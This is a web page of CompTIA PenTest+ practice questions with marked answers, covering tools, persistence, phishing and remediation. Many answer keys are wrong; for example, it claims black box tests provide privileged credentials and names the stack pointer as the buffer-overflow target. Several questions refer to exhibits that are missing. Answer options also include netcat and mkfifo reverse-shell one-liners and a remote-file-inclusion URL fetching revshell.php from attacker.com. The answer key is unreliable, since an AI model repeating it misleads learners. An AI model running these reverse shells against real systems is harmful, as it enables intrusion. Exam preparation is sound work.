CompTIA PenTest+ Certified for Cybersecurity Professionals Set 1

Which of the following tools is used to perform a credential brute force attack?


Options are :

  • Hydra (Correct)
  • John the Ripper
  • Hashcat
  • Peach

Answer : Hydra

Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement?


Options are :

  • To remove the persistence (Correct)
  • To enable persistence
  • To report persistence
  • To check for persistence

Answer : To remove the persistence

A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?


Options are :

  • arpspoof
  • nmap (Correct)
  • responder
  • burpsuite

Answer : nmap

A penetration tester executes the following commands:


Which of the following is a local host vulnerability that the attacker is exploiting?


Options are :

  • Insecure file permissions (Correct)
  • Application whitelisting
  • Shell escape
  • Writable service

Answer : Insecure file permissions

A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?


Options are :

  • Stored XSS (Correct)
  • Fill path disclosure
  • Expired certificate
  • Clickjacking

Answer : Stored XSS

A penetration tester observes that several high-numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?


Options are :

  • Transition the application to another port.
  • Filter port 443 to specific IP addresses.
  • Implement a web application firewall.
  • Disable unneeded services. (Correct)

Answer : Disable unneeded services.

Black box penetration testing strategy provides the tester with:


Options are :

  • a target list
  • a network diagram
  • source code
  • privileged credentials (Correct)

Answer : privileged credentials

Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).


Options are :

  • Shodan (Correct)
  • SET
  • BeEF
  • Wireshark
  • Maltego (Correct)
  • Dynamo

Answer : Shodan Maltego

A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?


Options are :

  • MAC address of the client
  • MAC address of the domain controller
  • MAC address of the web server
  • MAC address of the gateway (Correct)

Answer : MAC address of the gateway

An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?


Options are :

  • Selection of the appropriate set of security testing tools (Correct)
  • Current and load ratings of the ICS components
  • Potential operational and safety hazards
  • Electrical certification of hardware used in the test

Answer : Selection of the appropriate set of security testing tools

A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following conditions should a penetration tester specifically test for when performing an assessment? (Select TWO).


Options are :

  • Cleartext exposure of SNMP trap data
  • Software bugs resident in the IT ticketing system
  • S/MIME certificate templates defined by the CA
  • Health information communicated over HTTP (Correct)
  • DAR encryption on records servers (Correct)

Answer : Health information communicated over HTTP DAR encryption on records servers

Which of the following is an example of a spear phishing attack?


Options are :

  • Targeting an executive with an SMS attack (Correct)
  • Targeting a specific team with an email attack
  • Targeting random users with a USB key drop
  • Targeting an organization with a watering hole attack

Answer : Targeting an executive with an SMS attack

Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?


Options are :

  • Stack pointer register (Correct)
  • Index pointer register
  • Stack base pointer
  • Destination index register

Answer : Stack pointer register

During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).


Options are :

  • nc 192.168.1.5 44444
  • nc -nlvp 44444 -e /bin/sh (Correct)
  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f (Correct)
  • nc -e /bin/sh 192.168.1.5 44444
  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/f
  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f

Answer : nc -nlvp 44444 -e /bin/sh rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f

Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this?


Options are :

  • Manufacturers developing IoT devices are less concerned with security. (Correct)
  • It is difficult for administrators to implement the same security standards across the board.
  • IoT systems often lack the hardware power required by more secure solutions.
  • Regulatory authorities often have lower security requirements for IoT systems.

Answer : Manufacturers developing IoT devices are less concerned with security.

Which of the following commands starts the Metasploit database?


Options are :

  • msfconsole (Correct)
  • workspace
  • msfvenom
  • db_init
  • db_connect

Answer : msfconsole

A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).


Options are :

  • Convert to JAR. (Correct)
  • Decompile. (Correct)
  • Cross-compile the application.
  • Convert JAR files to DEX.
  • Re-sign the APK.
  • Attach to ADB.

Answer : Convert to JAR. Decompile.

A penetration tester identifies the following findings during an external vulnerability scan:


Which of the following attack strategies should be prioritized from the scan results above?


Options are :

  • Obsolete software may contain exploitable components.
  • Weak password management practices may be employed.
  • Cryptographically weak protocols may be intercepted.
  • Web server configurations may reveal sensitive information. (Correct)

Answer : Web server configurations may reveal sensitive information.

A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?


Options are :

  • Appendices
  • Executive summary (Correct)
  • Technical summary
  • Main body

Answer : Executive summary

A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and output:


Which of the following is the tester intending to do?


Options are :

  • Horizontally escalate privileges.
  • Scrape the page for hidden fields.
  • Analyze HTTP response code.
  • Search for HTTP headers. (Correct)

Answer : Search for HTTP headers.

During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?


Options are :

  • Disable the network port of the affected service. (Correct)
  • Complete all findings, and then submit them to the client.
  • Promptly alert the client with details of the finding.
  • Take the target offline so it cannot be exploited by an attacker.

Answer : Disable the network port of the affected service.

A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal?


Options are :

  • Perform an HTTP downgrade attack. (Correct)
  • Harvest the user credentials to decrypt traffic.
  • Perform an MITM attack.
  • Implement a CA attack by impersonating trusted CAs.

Answer : Perform an HTTP downgrade attack.

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:


https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php


Which of the following remediation steps should be taken to prevent this type of attack?


Options are :

  • Implement a blacklist.
  • Block URL redirections. (Correct)
  • Double URL encode the parameters.
  • Stop external calls from the application.

Answer : Block URL redirections.

A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?


Options are :

  • Discovery scan (Correct)
  • Stealth scan
  • Full scan
  • Credentialed scan

Answer : Discovery scan

A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended? (Select THREE).


Options are :

  • Mandate all employees take security awareness training. (Correct)
  • Implement two-factor authentication for remote access.
  • Install an intrusion prevention system. (Correct)
  • Increase password complexity requirements.
  • Install a security information event monitoring solution.
  • Prevent members of the IT department from interactively logging in as administrators.
  • Upgrade the cipher suite used for the VPN solution. (Correct)

Answer : Mandate all employees take security awareness training. Install an intrusion prevention system. Upgrade the cipher suite used for the VPN solution.

An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack?


Options are :

  • Principle of fear
  • Principle of authority (Correct)
  • Principle of scarcity
  • Principle of likeness
  • Principle of social proof

Answer : Principle of authority

A security assessor completed a comprehensive penetration test of a company and its networks and systems. During the assessment, the tester identified a vulnerability in the crypto library used for TLS on the company's intranet-wide payroll web application. However, the vulnerability has not yet been patched by the vendor, although a patch is expected within days. Which of the following strategies would BEST mitigate the risk of impact?


Options are :

  • Modify the web server crypto configuration to use a stronger cipher-suite for encryption, hashing, and digital signing.
  • Implement new training to be aware of the risks in accessing the application. This training can be decommissioned after the vulnerability is patched.
  • Implement an ACL to restrict access to the application exclusively to the finance department. Reopen the application to company staff after the vulnerability is patched. (Correct)
  • Require payroll users to change the passwords used to authenticate to the application. Following the patching of the vulnerability, implement another required password change.

Answer : Implement an ACL to restrict access to the application exclusively to the finance department. Reopen the application to company staff after the vulnerability is patched.

A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?


Options are :

  • Enable HTTP Strict Transport Security. (Correct)
  • Enable a secure cookie flag.
  • Encrypt the communication channel.
  • Sanitize invalid user input.

Answer : Enable HTTP Strict Transport Security.

A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?


Options are :

  • schtasks.exe /create/tr powershell.exe Sv.ps1 /run
  • net session server | dsquery -user | net use c$
  • powershell && set-executionpolicy unrestricted
  • reg save HKLM\System\CurrentControlSet\Services\Sv.reg (Correct)

Answer : reg save HKLM\System\CurrentControlSet\Services\Sv.reg

A client has scheduled a wireless penetration test. Which of the following describes the scoping target information MOST likely needed before testing can begin?


Options are :

  • The physical location and network ESSIDs to be tested
  • The number of wireless devices owned by the client
  • The client's preferred wireless access point vendor
  • The bands and frequencies used by the client's devices (Correct)

Answer : The bands and frequencies used by the client's devices

Comment / Suggestion Section
Point our Mistakes and Post Your Suggestions